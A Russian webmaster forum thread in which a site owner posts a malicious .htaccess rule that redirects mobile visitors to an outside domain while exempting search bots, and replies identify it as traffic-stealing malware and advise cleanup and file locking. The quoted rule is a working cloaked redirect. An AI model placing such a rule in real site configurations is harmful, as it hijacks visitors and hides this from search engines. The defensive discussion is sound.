в htaccess нашел...

[Удален]
1305

Саж, вот такой код:

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|symbos|windows\ mobile|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]

RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]

RewriteRule (.*) http://pda.qwertysoft.biz/?19&source=31.31.196.44 [L,R=302] # On

Хостер ругается на него. Что это, до недавнего времени не видел его.

Devvver
На сайте с 02.07.2008
Offline
691
#1

воруют мобильный траф. Ищите вирус и шеллы

http://devvver.ru/seo/borba-s-virusami-na-sajtax-udalenie-vredonosnogo-koda/

Мой блог. Все о создании сайтов,Seo и СДЛ ( https://e-moldovanu.com/ ) Мой SEO телеграм канал https://t.me/seobloggers
TF-Studio
На сайте с 17.08.2010
Offline
334
#2
Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
МД
На сайте с 08.08.2013
Offline
4
#3

Копайте глубоко, ибо бороться будете долго и муторно... будет появляться пока не закроете все дыры. Лучше обратиться к профи.

M
На сайте с 12.08.2013
Offline
3
#4

Вирус, если откроете сайт с мобильника или планшета - перекинет по другому адресу под предлогом обновления Оперы.

У меня была аналогичная ситуация пару месяцев назад, сайт на WP, пришлось все .htaccess вычищать и доступы менять. Больше не повторялось.

Возьму на аудит интернет-магазины
Adriano_Chelintano
На сайте с 30.09.2011
Offline
78
#5
Хостер ругается на него.

Скоро и ПС начнут ругаться. Тоже сталкивался с подобным. Вам нужно не только удалить данный код, но и найти уязвимость, как данный код попал вам на сайт. Очень хорошо по очистке подобной дряни помогает скрипт http://www.revisium.com/ai/

L
На сайте с 31.07.2013
Offline
1
#6

Недавно один из курируемых сайтов поймал такой. AI-Bolit его не видел, сообщал, что всё чисто. Есть ощущение, что поймали через хостера (Таймвеб), потому что он одновременно появился на всех сайтах этого хостинга.

Вылечилось полным удалением и новой загрузкой файлов движка (WP). И закрытием доступа к htaccess через chmod.

Ещё грешим на плагины и взлом через владельца аккаунта хостинга. Он утверждает, что у него всё в порядке, но 100% уверенности в его словах нет.

Для начала закройте доступ к htaccess. Потом удалите и перекачайте все файлы, которые можно (и для которых есть 100% чистые версии). Например, файлы движка. Удалите все ненужные файлы и папки. Например, старые плагины. А оставшееся методично проверяйте на появление неожиданного кода.

beginerx
На сайте с 13.07.2009
Offline
173
#7

а как закрыть доступ, оно ведь из пхп может доступ снова открыть...?

>>>Скорость и Реакция<<< (https://vk.com/app4629907 ): онлайн тренировка скорости и времени реакции.... (https://vk.com/app4612117 )... (https://vk.com/club18740762 ).
TimeBlogger
На сайте с 30.07.2008
Offline
86
#8
beginerx:
а как закрыть доступ, оно ведь из пхп может доступ снова открыть...?

ну как вариант chmod 444. А так, на будущее скрипт регулярной проверки (раз в полчаса, час) на изменения/добавление файлов начать использовать.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий